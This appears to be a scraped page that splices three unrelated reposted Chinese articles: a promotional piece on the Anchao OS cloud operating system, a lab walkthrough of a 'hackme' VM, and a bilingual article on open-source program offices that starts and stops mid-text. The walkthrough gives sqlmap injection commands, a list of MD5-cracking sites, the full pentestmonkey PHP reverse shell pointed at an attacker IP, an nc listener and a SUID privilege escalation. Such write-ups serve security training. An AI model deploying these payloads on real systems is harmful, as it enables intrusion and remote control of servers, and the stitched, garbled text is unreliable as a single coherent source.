五大维度解读安超OS 那么，什么是云操作系统？安超OS通用型云操作系统又有什么与众不同之处呢? 华云数据集团联席总裁、首席技术官谭瑞忠 在华云数据集团联席总裁、首席技术官谭瑞忠看来，云操作系统是基于服务器操作系统，高度的融合了基础设施的资源，实现了资源弹性伸缩扩展，以及具备运维自动化智能化等云计算的特点。同时，云操作系统具有和计算机操作系统一样的高稳定性，高性能，高易用性等特征。 但是，相比计算机操作系统，云计算的操作系统会更为复杂，属于云计算后台数据中心的整体管理运营系统，是构架于服务器、存储、网络等基础硬件资源和PC操作系统、中间件、数据库等基础软件之上的、管理海量的基础硬件、软件资源的云平台综合管理系统。 更为关键的是，和国内外很多基础设备厂商基于自已的产品与理解推出了云操作系统不同，安超OS走的是通用型云操作系统的技术路线，它不是采用软硬件一体的封闭或半封闭的云操作系统平台，所以这也让安超OS拥有安全稳定、广泛兼容、业务优化、简洁运维、高性价比方面的特性，具体而言： 一是，在安全稳定方面，安超OS采用全容错架构设计，从数据一致性校验到磁盘损坏，从节点故障到区域性灾难，提供端到端的容错和灾备方案，为企业构筑高可用的通用型云环境，为企业的业务运营提供坚实与安全可靠的基础平台。 二是，在广泛兼容方面，安超OS所有产品技术、专利软著、品牌都拥有国内自主权，符合国家相关安全自主可信的规范要求，无服务器硬件锁定，支持国内外主流品牌服务器，同时适配大多数芯片、操作系统和中间件，支持利旧与升级，更新硬件时无需重新购买软件，为企业客户提供显著的投资保护，降低企业IT成本。 三是，在业务优化方面，安超OS具备在同一集群内提供混合业务负载的独特能力，可在一套安超OS环境内实现不同业务的优化：为每类应用定制不同的存储数据块大小，优化应用读写效率，提供更高的业务性能；数据可按组织架构逻辑隔离，部门拥有独立的副本而无需新建一套云环境，降低企业IT的成本与复杂度；数据重构优先级保证关键业务在故障时第一时间恢复，也能避免业务链启动错误的场景出现。 四是，在简捷运维方面，安超OS是一款轻量级云创新平台，其所有管理策略以虚拟机和业务为核心，不需要配置或管理卷、LUN、文件系统、RAID等需求，从根本上简化了云操作系统的管理。通过标准ISO安装，可实现30分钟平台极速搭建，1分钟业务快速部署，一键集群启停与一键运维巡检。降低企业IT技术门槛，使IT部门从技术转移并聚焦于业务推进和变革，助力企业实现软件定义数据中心。 五是，在高性价比方面，安超OS在设计之初，华云数据就考虑到它是一个小而美、大而全的产品，所以给客户提供组件化授权，方便用户按需购买，按需使用，避免一次性采购过度，产生配置浪费。并且安超OS提供在线压缩等容量优化方案，支持无限个数无损快照，无硬件绑定，支持License迁移。 由此可见，安超OS通用型云操作系统的本质，其实就是一款以安全可信为基础，以业务优化为核心的轻量级云创新平台，能够让中国政府和企业在数字化转型中，更好的发挥云平台的价值，同时也能有效的支持他们的业务创新。 生态之上的云操作系统 纵观IT发展的过程，每个时代都离不开通用型操作系统：在PC时代，通用型操作系统是Windows、Linux；在移动互联时代，通用型操作系统是安卓(Android)，而这些通用型操作系统之所以能够成功，背后其实也离不开生态的开放和壮大。 如果以此类比的话，生态合作和生态开放同样也是华云安超OS产品的核心战略，这也让安超OS超越了传统意义上的云创新平台，是一款架构于生态开放之上的云操作系统。 华云数据集团副董事长、执行副总裁马杜 据华云数据集团副董事长、执行副总裁马杜介绍，目前华云数据正与业内众多合作伙伴建立了生态合作关系，覆盖硬件、软件、芯片、应用、方案等多个领域，通过生态合作，华云数据希望进一步完善云数据中心的产业链生态，与合作伙伴共建云计算生态圈。 其中，在基础架构方面，华云数据与飞腾、海光、申威等芯片厂商以及中标麒麟、银河麒麟等国产操作系统实现了互认证，与VMware、Dell EMC、广达、浪潮、曙光、长城、Citrix、Veeam、SevOne、XSKY、锐捷网络、上海仪电、NEXIFY等多家国内外知名IT厂商达成了战略合作，共同为中国政企用户提供基于云计算的通用行业解决方案与垂直行业解决方案，助推用户上云实现创新加速模式。 同时，在解决方案方面，华云数据也一直在完善自身的产业链，建立最广泛的生态体系。例如，PaaS平台领域的合作伙伴包括灵雀云、Daocloud、时速云、优创联动、长城超云、蓝云、星环科技、华夏博格、时汇信息、云赛、热璞科技、思捷、和信创天、酷站科技、至臻科技达成合作关系；数据备份领域有金蝶、爱数、Veeam、英方云、壹进制；安全领域有亚信安全、江南安全、绿盟、赛亚安全、默安科技；行业厂商包括善智互联、蓝美视讯、滴滴、天港集团、航天科工等合作伙伴，由此形成了非常有竞争力的整体解决方案。 不仅如此，华云数据与众多生态厂家共同完成了兼容性互认证测试，构建了一个最全面的基础架构生态体系，为推出的国产通用型云操作系统提供了一个坚实的基础。也让该系统提高了其包括架构优化能力、技术研发能力、资源整合能力、海量运营能力在内的综合能力，为客户提供稳定、可靠的上云服务，赋能产业变革。 值得一提的是，华云数据还发布了让利于合作伙伴的渠道合作策略，通过和合作伙伴的合作共赢，华云数据希望将安超OS推广到国内的全行业，让中国企业都能用上安全、放心的国产通用型云操作系统，并让安超OS真正成为未来中国企业上云的重要推手。 显而易见，数字化的转型与升级，以及数字经济的落地和发展，任重而道远，艰难而伟大，而华云数据正以安超OS云操作系统为核心构建的新生态模式和所释放的新能力，不仅会驱动华云数据未来展现出更多的可能性，激发出更多新的升维竞争力，更将会加速整个中国政府和企业的数字化转型步伐。 全文总结，在云计算落地中国的过程中，华云数据既是早期的探索者，也是落地的实践者，更是未来的推动者。特别是安超OS云操作系统的推出，背后正是华云凭借较强的技术驾驭能力，以及对中国企业用户痛点的捕捉，使得华云能够走出一条差异化的创新成长之路，也真正重新定义了“中国云”未来的发展壮大之路。 申耀的科技观察，由科技与汽车跨界媒体人申斯基（微信号：shenyao）创办，16年媒体工作经验，拥有中美两地16万公里自驾经验，专注产业互联网、企业数字化、渠道生态以及汽车科技内容的观察和思考。 本篇文章为转载内容。原文链接：https://blog.csdn.net/W5AeN4Hhx17EDo1/article/details/99899011。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

...128.png)] 成功登录后 尝试手工注入：x' or 1=1 成功返回所有信息，说明存在SQL注入 2.3漏洞利用 2.3.1 sqlmap 利用注入漏洞 使用 burp 抓查询数据包 POST /welcome.php HTTP/1.1Host: 192.168.184.149Content-Length: 23Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: http://192.168.184.149Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://192.168.184.149/welcome.phpAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=jub1jihglt85brngo5imqsifb3Connection: closesearch=x 将数据包保存为文件 hackme1.txt 使用 sqlmap 跑一下测试漏洞并获取数据库名： 🚀 python sqlmap.py -r hackme1.txt --dbs --batch [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-DjhXfuV9-1650016495544)(https://cdn.jsdelivr.net/gh/hirak0/Typora/img/image-20220110171527015.png)] 数据库除了基础数据库有webapphacking 接下来咱们获取一下表名 🚀 python sqlmap.py -r hackme1.txt --batch -D webapphacking --tables [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-1mzxiwhu-1650016495544)(C:\Users\zhang\AppData\Roaming\Typora\typora-user-images\image-20220110172336353.png)] 可以得到两个表books和users 咱们先获取一下users表的信息 🚀 python sqlmap.py -r hackme1.txt --batch -D webapphacking -T users --dump --batch 可以看到有一个superadmin，超级管理员，看起来像一个md5 扩展 在线解密md5网站 国内MD5解密： http://t007.cn/ https://cmd5.la/ https://cmd5.com/ https://pmd5.com/ http://ttmd5.com/ https://md5.navisec.it/ http://md5.tellyou.top/ https://www.somd5.com/ http://www.chamd5.org/ 国外MD5解密： https://www.md5tr.com/ http://md5.my-addr.com/ https://md5.gromweb.com/ https://www.md5decrypt.org/ https://md5decrypt.net/en/ https://md5hashing.net/hash/md5/ https://hashes.com/en/decrypt/hash https://www.whatsmyip.org/hash-lookup/ https://www.md5online.org/md5-decrypt.html https://md5-passwort.de/md5-passwort-suchen 解出来密码是：Uncrackable 登录上去，发现有上传功能 2.3.2 文件上传漏洞 getshell 将 kali 自带的 php-reverse-shell.php 复制一份到 查看文件内容，并修改IP地址 <?php// php-reverse-shell - A Reverse Shell implementation in PHP// Copyright (C) 2007 pentestmonkey@pentestmonkey.net//// This tool may be used for legal purposes only. Users take full responsibility// for any actions performed using this tool. The author accepts no liability// for damage caused by this tool. If these terms are not acceptable to you, then// do not use this tool.//// In all other respects the GPL version 2 applies://// This program is free software; you can redistribute it and/or modify// it under the terms of the GNU General Public License version 2 as// published by the Free Software Foundation.//// This program is distributed in the hope that it will be useful,// but WITHOUT ANY WARRANTY; without even the implied warranty of// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the// GNU General Public License for more details.//// You should have received a copy of the GNU General Public License along// with this program; if not, write to the Free Software Foundation, Inc.,// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.//// This tool may be used for legal purposes only. Users take full responsibility// for any actions performed using this tool. If these terms are not acceptable to// you, then do not use this tool.//// You are encouraged to send comments, improvements or suggestions to// me at pentestmonkey@pentestmonkey.net//// Description// -----------// This script will make an outbound TCP connection to a hardcoded IP and port.// The recipient will be given a shell running as the current user (apache normally).//// Limitations// -----------// proc_open and stream_set_blocking require PHP version 4.3+, or 5+// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.//// Usage// -----// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.set_time_limit (0);$VERSION = "1.0";$ip = '192.168.184.128'; // CHANGE THIS$port = 6666; // CHANGE THIS$chunk_size = 1400;$write_a = null;$error_a = null;$shell = 'uname -a; w; id; /bin/sh -i';$daemon = 0;$debug = 0;//// Daemonise ourself if possible to avoid zombies later//// pcntl_fork is hardly ever available, but will allow us to daemonise// our php process and avoid zombies. Worth a try...if (function_exists('pcntl_fork')) {// Fork and have the parent process exit$pid = pcntl_fork();if ($pid == -1) {printit("ERROR: Can't fork");exit(1);}if ($pid) {exit(0); // Parent exits}// Make the current process a session leader// Will only succeed if we forkedif (posix_setsid() == -1) {printit("Error: Can't setsid()");exit(1);}$daemon = 1;} else {printit("WARNING: Failed to daemonise. This is quite common and not fatal.");}// Change to a safe directorychdir("/");// Remove any umask we inheritedumask(0);//// Do the reverse shell...//// Open reverse connection$sock = fsockopen($ip, $port, $errno, $errstr, 30);if (!$sock) {printit("$errstr ($errno)");exit(1);}// Spawn shell process$descriptorspec = array(0 => array("pipe", "r"), // stdin is a pipe that the child will read from1 => array("pipe", "w"), // stdout is a pipe that the child will write to2 => array("pipe", "w") // stderr is a pipe that the child will write to);$process = proc_open($shell, $descriptorspec, $pipes);if (!is_resource($process)) {printit("ERROR: Can't spawn shell");exit(1);}// Set everything to non-blocking// Reason: Occsionally reads will block, even though stream_select tells us they won'tstream_set_blocking($pipes[0], 0);stream_set_blocking($pipes[1], 0);stream_set_blocking($pipes[2], 0);stream_set_blocking($sock, 0);printit("Successfully opened reverse shell to $ip:$port");while (1) {// Check for end of TCP connectionif (feof($sock)) {printit("ERROR: Shell connection terminated");break;}// Check for end of STDOUTif (feof($pipes[1])) {printit("ERROR: Shell process terminated");break;}// Wait until a command is end down $sock, or some// command output is available on STDOUT or STDERR$read_a = array($sock, $pipes[1], $pipes[2]);$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);// If we can read from the TCP socket, send// data to process's STDINif (in_array($sock, $read_a)) {if ($debug) printit("SOCK READ");$input = fread($sock, $chunk_size);if ($debug) printit("SOCK: $input");fwrite($pipes[0], $input);}// If we can read from the process's STDOUT// send data down tcp connectionif (in_array($pipes[1], $read_a)) {if ($debug) printit("STDOUT READ");$input = fread($pipes[1], $chunk_size);if ($debug) printit("STDOUT: $input");fwrite($sock, $input);}// If we can read from the process's STDERR// send data down tcp connectionif (in_array($pipes[2], $read_a)) {if ($debug) printit("STDERR READ");$input = fread($pipes[2], $chunk_size);if ($debug) printit("STDERR: $input");fwrite($sock, $input);} }fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);// Like print, but does nothing if we've daemonised ourself// (I can't figure out how to redirect STDOUT like a proper daemon)function printit ($string) {if (!$daemon) {print "$string\n";} }?> [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-RhgS5l2a-1650016495549)(https://cdn.jsdelivr.net/gh/hirak0/Typora/img/image-20220110173559344.png)] 上传该文件 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-CKEldpll-1650016495549)(https://cdn.jsdelivr.net/gh/hirak0/Typora/img/image-20220110173801442.png)] 在 kali 监听：nc -lvp 6666 访问后门文件：http://192.168.184.149/php-reverse-shell.php 不成功 尝试加上传文件夹：http://192.168.184.149/uploads/php-reverse-shell.php 成功访问 使用 python 切换为 bash：python3 -c 'import pty; pty.spawn("/bin/bash")' 2.4权限提升 2.4.1 SUID 提权 sudo -l不顶用了，换个方法 查询 suid 权限程序: find / -perm -u=s -type f 2>/dev/null www-data@hackme:/$ find / -perm -u=s -type f 2>/dev/nullfind / -perm -u=s -type f 2>/dev/null/snap/core20/1270/usr/bin/chfn/snap/core20/1270/usr/bin/chsh/snap/core20/1270/usr/bin/gpasswd/snap/core20/1270/usr/bin/mount/snap/core20/1270/usr/bin/newgrp/snap/core20/1270/usr/bin/passwd/snap/core20/1270/usr/bin/su/snap/core20/1270/usr/bin/sudo/snap/core20/1270/usr/bin/umount/snap/core20/1270/usr/lib/dbus-1.0/dbus-daemon-launch-helper/snap/core20/1270/usr/lib/openssh/ssh-keysign/snap/core/6531/bin/mount/snap/core/6531/bin/ping/snap/core/6531/bin/ping6/snap/core/6531/bin/su/snap/core/6531/bin/umount/snap/core/6531/usr/bin/chfn/snap/core/6531/usr/bin/chsh/snap/core/6531/usr/bin/gpasswd/snap/core/6531/usr/bin/newgrp/snap/core/6531/usr/bin/passwd/snap/core/6531/usr/bin/sudo/snap/core/6531/usr/lib/dbus-1.0/dbus-daemon-launch-helper/snap/core/6531/usr/lib/openssh/ssh-keysign/snap/core/6531/usr/lib/snapd/snap-confine/snap/core/6531/usr/sbin/pppd/snap/core/5662/bin/mount/snap/core/5662/bin/ping/snap/core/5662/bin/ping6/snap/core/5662/bin/su/snap/core/5662/bin/umount/snap/core/5662/usr/bin/chfn/snap/core/5662/usr/bin/chsh/snap/core/5662/usr/bin/gpasswd/snap/core/5662/usr/bin/newgrp/snap/core/5662/usr/bin/passwd/snap/core/5662/usr/bin/sudo/snap/core/5662/usr/lib/dbus-1.0/dbus-daemon-launch-helper/snap/core/5662/usr/lib/openssh/ssh-keysign/snap/core/5662/usr/lib/snapd/snap-confine/snap/core/5662/usr/sbin/pppd/snap/core/11993/bin/mount/snap/core/11993/bin/ping/snap/core/11993/bin/ping6/snap/core/11993/bin/su/snap/core/11993/bin/umount/snap/core/11993/usr/bin/chfn/snap/core/11993/usr/bin/chsh/snap/core/11993/usr/bin/gpasswd/snap/core/11993/usr/bin/newgrp/snap/core/11993/usr/bin/passwd/snap/core/11993/usr/bin/sudo/snap/core/11993/usr/lib/dbus-1.0/dbus-daemon-launch-helper/snap/core/11993/usr/lib/openssh/ssh-keysign/snap/core/11993/usr/lib/snapd/snap-confine/snap/core/11993/usr/sbin/pppd/usr/lib/eject/dmcrypt-get-device/usr/lib/openssh/ssh-keysign/usr/lib/snapd/snap-confine/usr/lib/policykit-1/polkit-agent-helper-1/usr/lib/dbus-1.0/dbus-daemon-launch-helper/usr/bin/pkexec/usr/bin/traceroute6.iputils/usr/bin/passwd/usr/bin/chsh/usr/bin/chfn/usr/bin/gpasswd/usr/bin/at/usr/bin/newgrp/usr/bin/sudo/home/legacy/touchmenot/bin/mount/bin/umount/bin/ping/bin/ntfs-3g/bin/su/bin/fusermount 发现一个可疑文件/home/legacy/touchmenot 在 https://gtfobins.github.io/网站上查询：touchmenot 没找到 尝试运行程序：发现直接提权成功 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qcpXI6zZ-1650016495551)(https://cdn.jsdelivr.net/gh/hirak0/Typora/img/image-20220110174530827.png)] 找半天没找到flag的文件 what?就这？ 总结 本节使用的工具和漏洞比较基础，涉及 SQL 注入漏洞和文件上传漏洞 sql 注入工具：sqlmap 抓包工具：burpsuite Webshell 后门：kali 内置后门 Suid 提权：touchmenot 提权 本篇文章为转载内容。原文链接：https://blog.csdn.net/Perpetual_Blue/article/details/124200651。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

...组织是由万事达包容性发展中心和洛克菲勒基金会支持，旨在促进使用数据科学来应对当今社会所面临的巨大挑战的非营利性组织。 虽然几乎所有组织都在使用着开源软件，但只有少数组织为这些项目作出了贡献。The New Stack、Linux Foundation Research 和 TODO Group 在 9 月发布的一项调查中，42% 的参与者表示，他们至少有时会为开源项目做出贡献。 而同一项研究表明，只有36%的组织会培训他们的工程师为开源作出贡献。 个体公司应该支持贡献这些他们使用最多且对他们成功至关重要的项目，Mikhailov认为：“如果你使用开源，你就应该为他做出属于你自己的贡献。” Part2OSPO的好处：更少的技术负债，更好的招聘效果 参与开源社区----特别是在内部开源计划办公室（OSPO）的指导下----不仅可以保证对组织成功至关重要项目的健康发展，还可以提高项目安全性，同时可以允许工程师在项目发展规划中起到更大的作用。 例如，如果一家公司使用了开源工具，并对其进行了一些调整使其变得更好。但如果这项改进没有反馈到开源社区，那么开源项目的正式版本就会一开始与该公司所使用的版本有所不同。 “当原始数据来源发生变化且你所使用的是不同的版本时，你的技术负债将越来越多。而这些差异是以天为单位迅速增长的。”VMware 开源营销和战略总监 Suzanne Ambiel 表示，“所以你很快就会变成一个开源项目里独一无二变体的‘自豪’用户和维护人员。” “如果技术负债越来越多，那么公司的管理成本则会非常昂贵”。 实际上对于开源活动的支持也变成了一种招聘途径。“这真是一块吸引人才的磁铁，”Ambiel说，“这也是新员工所寻求的“。 她还提到，一些工程经理可能会对贡献开源而减损核心产品的开发的精力而感到担忧。她补充到，他们的理由有可能是这样的：“我只有有限的才华与时间，且我需要这些只做我认为可以处理且看到投资回报的事情。” 但她说，这是一种鼠目寸光的态度。支持开源社区并且作出贡献的员工，可以从中培养技能与增长才干。 云安全供应商 Sysdig 的首席技术官兼创始人 Loris Degionni 也赞同这一观点：“找到为开源做出贡献的员工无疑就找到一座金矿，”他说。 他认为，这些参与开源的员工更具备公司想拥有的竞争力并将一些功能融入至社区所支持的标准中。且在人才争夺战中，拥抱开源的公司也更受到开发人员的青睐。 “最后，开源项目是由你可能无法聘请的技术专家社区推动的”，他说，“当员工积极参与并于这些专家合作时，他们将能更好地深入这些顶级的实践，并将这些收获带回到你的组织之中。” “当原始数据来源发生变化且你所使用的是不同的版本时，你的技术负债将越来越多...所以你很快就会变成一个开源项目里独一无二变体的”自豪“用户和维护人员。”— Suzanne Ambiel，VMware 开源营销和战略总监 “但是这一切终究不会白费--开发人员不应该把空闲时间用在磨练他们的技能上，因为你的公司很快就会在他们的努力中看到好处。” Degionni认为，OSPO（开源计划办公室）可以帮助公司实现这些目标，以及帮助确定贡献的优先级并确保合作的进行。除此之外，他们也可以对公司内部开发应用程序方面的治理提供相关帮助。 “开源团队的成员也可以成为开源技术的伟大内部传播者，并充当组织与更广泛社区之间的桥梁。”他补充道。 在 The New Stack、Linux Foundation Research 和 TODO Group 的 9 月调查中，近 53% 的拥有 OSPO的组织表示，由于拥有了OSPO，他们看到了更多创新，而近 43% 的组织表示，他们在外部开源项目的参与度上有所增加。 Part3更多OSPO的好处：商业优势 网络安全公司 ThreatX 的首席创新官 Tom Hickman 表示，为开源社区做出贡献，不仅有助于社区，还有助于为社区做出贡献的公司。 “围绕一个项目而发展的开发人员社区，有助于代码库的形成，并吸引更多的开发人员参与”，他说，“这可以变成一个良性循环。” 此外，根据哈佛商学院的研究，为开源项目作出贡献的公司从使用开源的项目中获得的生产价值，是不参与开源项目公司的两倍。 Cloud Native Computing Foundation 的首席技术官 Chris Aniszczyk 说，世界上许多巨头公司都为开源作出了贡献。他还提到，开源贡献者的指数是作为公司是否有所作为的参考。 科技巨头占据了这份榜单的主导地位：谷歌、微软、红帽、英特尔、IBM、亚马逊、Facebook、VMware、GitHub 和 SAP 依次是排名前 10 的贡献者。但Aniszczyk 表示，但也有很多终端用户公司进入前 100 名，包括 Uber、BBC、Orange、Netflix 和 Square。 “我们一直知道，在上游项目中工作不仅仅是关正确与否----它是开源软件开发的最佳方法，也是向客户提供开源福利的最佳方式”他说，“很高兴看到IT领导者们也认识到了这一点。” 为了和这些公司一起作出贡献，公司也需要有自己的开源策略，而拥有一个开源计划办公室则可以为其提供帮助。 “在使用开源软件方面，OPSO为公司提供了一个至关重要的能力中心”他说。 这与公司拥有安全运营中心的方式类似，他说。 “围绕一个项目而发展的开发人员社区，有助于代码库的形成，并吸引更多的开发人员参与，这可以变成一个良性循环。” ——Tom Hickman，ThreatX 首席创新官 “如果你对安全团队进行相应投资，你通常是不会期望你的软件是安全的，也无法及时应对安全事件。”他说。 “同样的逻辑也适用于 OSPO，这就是为什么你会看到许多领先的公司，例如Apple、Meta、Twitter、Goldman Sachs、Bloomberg 和 Google 都拥有 OSPO。他们走在了趋势的前面。” 而对组织内的开源活动的支持态度亦可成为软件供应商们的差异化原因与营销的机会。 根据Red Hat 2月分发布的一项调查，82%的IT领导者更倾向于选择为开源社区作出贡献的软件供应商。 受访者表示，当供应商支持开源社区时，就表示着他们更熟悉开源的流程并且在客户遇到技术难题时会更加有效。 但收益的不仅仅是软件供应商们。 根据 The New Stack、Linux Foundation Research 和 TODO Group 9 月份的调查，57% 拥有 OSPO 的组织将使用它们来进一步发展战略关系和建立合作伙伴关系。 十年前，Mark Hinkle 在 Citrix 工作时创办了一个开源计划办公室。他指出了在内部拥有一个 OSPO将如何使公司受益。 “对于我们来说，最大的工作是让不熟悉开源的员工学会并参与其中，成为优秀的社区成员”，他说，“我们还就如何确保我们的IP不会在没有正确理解的情况下进入项目的情况提供了指导，并确保我们没有与我们企业软件许可相冲突的开源项目合作。” 他说，OSPO还帮助Citrix确定了公司参与开源项目和Linux基金会等贸易组织的战略机会。 如今，他是云原生开源集成平台 TriggerMesh 的首席执行官兼联合创始人。 他说，参与开源系统对公司来说有着重大的经济效益。 “我们参与Knative是为了分享我们基础底层平台的开发，但作为业务的一部分，我们也拥有相关的增值服务。”他说，“通过共享该平台的研发，这为我们提供了更多的资源来改进我们自己的差异化技术。” Part4如何入门开源 在 The New Stack、Linux Foundation Research 和 TODO Group 的 9 月份调查中，有 63% 的公司表示，拥有OSPO 对其工程或产品团队的成功至关重要，高于上一年度该项研究数据的 54%。 其中77% 的人表示他们的开源程序对他们的软件实践产生了积极影响，例如提高了代码质量。 但公司也不可能总是为他们使用的每一个开源项目而花费精力。 “首先，节流一下”，VMware 的 Ambiel 建议道。 公司应该关注投入使用中最有意义的项目。而这也是OSPO可以帮助确定优先事项并确保技术与战略一致性的领域。 之后，开发人员应该自己去了解一下。项目通常提供相关在线文档，一般包含贡献着指南、治理文档和未解决问题列表。 “对于那些你较感兴趣的项目中，你可以介绍一下自己----打个招呼”，她说。“然后转到Slack频道或者分发列表，询问他们需要帮助的地方。也许他们不需要帮助，一切完好；又或者他们也有可能使用新人来审查核验代码。” Ambiel 说，开源计划办公室不仅可以帮助制定为开源社区做出贡献的商业案例，还可以帮助公司以安全、可靠和健全的方式来做这件事。 “如果我为一家公司工作，并想为开源做出贡献，我不想意外披露、泄露或破坏任何专利，”她说。“而OSPO可以帮助您做出明智的选择。” 她说，OSPO还可以在开源方面提供领导力和指导理念的支持。“它可以提供引领、指导、辅导和最佳实践的作用。” Aqua Security的开发人员倡导者Anaïs Urlichs则认为，支持开源的承诺必须从高层开始。 她说，“公司在多数时候往往不重视对开源的投资，所以员工自然而然不被鼓励对此作出贡献。” 在这些情况下，员工对于开源的热情也会在空闲时间里对开源的建设而消散殆尽，这对于开源的发展来说是不可持续的。 “如果公司对开源项目依赖度高，那么将开源贡献纳入工程师的日程安排是很重要的，”她说。“一些公司定义了员工可以为开源建设的时间百分比，将其作为他们正常工作日的一部分。” The New Stack 是 Insight Partners 的全资子公司，Insight Partners 是本文提到的以下公司的投资者：Sysdig、Aqua Security。 中英对照版 How an OSPO Can Help Your Engineers Give Back to Open Source OSPO （开源项目办公室）是如何使工程师回馈开源的 When it comes to open source software, there’s a big and growing problem: most organizations are takers, not givers. 谈到开源软件，有一个较大且日益严重的问题：大多数组织都是索取者，而不是给予者。 There’s a classic XKCD comic that shows a giant structure representing modern digital infrastructure, dependent on a tiny component created by “some random person in Nebraska” who has been “thanklessly maintaining since 2003.” 经典漫画XKCD展示了一个代表现代数字基础设施的巨大结构，它依赖于“内布拉斯加州的某位人士”创建的微小组件，该组件“自2003年来一直都处于吃力不讨好的状态”。 Randall Monroe’s XKCD comic illustrates the open source dilemma: overreliance on a small number of volunteer project maintainers. Randall Monroe 的XKCD漫画展示了目前开源面临的窘境：过度依赖少数项目维护志愿者的志愿服务。 This would have been funny, except that this is exactly what happened when security vulnerabilities were discovered in Log4j last December. （开源项目由志愿者自发来维护，）这听起来像是一件很滑稽的事情，但事实上去年十二月在Log4j中发现的安全漏洞也确实存在着上述情况。 The Java-based logging tool is ubiquitous in enterprise publications. In the last three months, for example, Log4j has been downloaded more than 30 million times, according to a report by the enterprise software company Sonatype. 然而这个基于Java的日志记录工具已经在企业内部刊物中无处不在。例如根据软件公司Sonatype的一份报告显示，在过去的三个月里，Log4j的下载量就已经超过3000万次。 The tool has 440,000 lines of code, according to Synopsys‘ Black Duck Open Hub research tool, with nearly 24,000 contributions by nearly 200 developers. That’s a large dev team compared to other open source projects. But looking closer at the numbers, more than 70% of commits were by just five people. 根据Synopsys(新思）公司旗下的Black Duck Open Hub 研究工具显示。Log4j有着440,000行代码，由近200名开发人员贡献了将近24,000行代码。其实与其他开源项目相比，这是一个庞大的开发团队。但是如果关注数据的话，就会发现超过70%的提交是仅仅靠五个人来完成的。 Log4j’s home page lists about a dozen members on its project team. Most projects have far fewer developers working on them — and that presents a problem for the organizations that depend on them. Log4j的主页上展示了十几位项目团队的成员。而大多项目的开发人员要比其原本需要的少得多----这是高度依赖开发人员团队所呈现出来的问题。 “There is little incentive for anyone today to contribute to an existing open source project,” said Jeremy Stretch, distinguished engineer at NS1, a DNS network company. “There’s usually no direct compensation, and few accolades are offered — most users don’t even know who maintains the software that they use.” “如今的人没有什么动力去为现有的开源项目做贡献”，来自DNS网络公司NS1的杰出工程师Jeremy Strech说，“因为通常来说，这没有直接的物质回报，也很少提供荣誉----大多数用户甚至不知道他们所用的软件是谁维护的。” The most common motivation among open source contributors is to add a feature that they themselves want to see, he said. “Once this has been achieved, the contributor rarely sticks around.” 他说，开源贡献者们最常见的动机就是添加他们自己想要的功能。“一旦实现了这一点，他们几乎都不会留下来。” Meanwhile, as a project becomes more popular, the burden on the core team of maintainers keeps increasing. 与此同时，随着项目的逐渐流行，对于维护方面的核心团队来说，他们的负担也在不断增加。 “More users means more feature requests and more bug reports — but not more maintainers,” Stretch said. “What was once an enjoyable hobby can quickly become a tedious chore, and many maintainers understandably opt to simply abandon their projects altogether.” “更多的用户意味有着更多的功能需求和错误报告----但不是更多的维护人员”，Stretch说。“曾经令人愉快的爱好很快就会变成一项乏味的项目，所以很多维护人员选择干脆完全放弃他们的项目，这也是可以理解的。” Part1The Tragedy of the Commons The open source software ecosystem is a perfect example of the “tragedy of the commons.” 开源软件的生态系统，就是“公地悲剧”的一个完美例子。 And the tragedy is — when everyone uses, but no one contributes, that resource — whether it’s an overrun park or an open source project — eventually collapses from overuse and underinvestment. Everyone loves using free stuff, but everyone expects someone else to take care of it. 这个悲剧就是---当一种资源，无论是一个超限的公园还是一个开源项目，所有人都在使用而没有人贡献之时，最终都会因为过度使用和投入不足而崩溃坍塌。 This approach can save you money in the short term, but it can become a fatal flaw over time. Especially since open source software is everywhere, running everything. 这种方式可以在短期内为你节省资金，但随着时间的推移，它可能会变成项目里致命的缺陷。 Linux, for example, the open source operating system, runs on 96% of the world’s top 1 million servers, and 90% of all cloud infrastructure is on Linux. Not to mention that 85% of all smartphones in the world run Linux, in the form of the Android OS. 拿Linux来说，这个开源操作系统在全球前100万台服务器中运行率在96%以上，且这些服务器90%的云基础设施也都在Linux上。更不用说世界上85%的智能手机都运行着Linux，即Android操作系统。 Then there’s Java, Apache, WordPress, Cassandra, Hadoop, MySQL, PHP, ElasticSearch, Kubernetes — the list of ubiquitous open source projects goes on and on. 还有Java, Apache, WordPress, Cassandra, Hadoop, MySQL, PHP, ElasticSearch, Kubernetes--这些常见开源项目的列表还在逐渐增加着。 Without open source, much of today’s technical infrastructure would immediately grind to a halt. 如果没有开源，今天的大部分技术基础设施的建设也将会戛然而止。 “It is a real problem,” said Danil Mikhailov, executive director at Data.org, a nonprofit backed by the Mastercard Center for Inclusive Growth and The Rockefeller Foundation that promotes the use of data science to tackle society’s greatest challenges. “这是一个很现实的问题”，Data.org的执行董事Danil 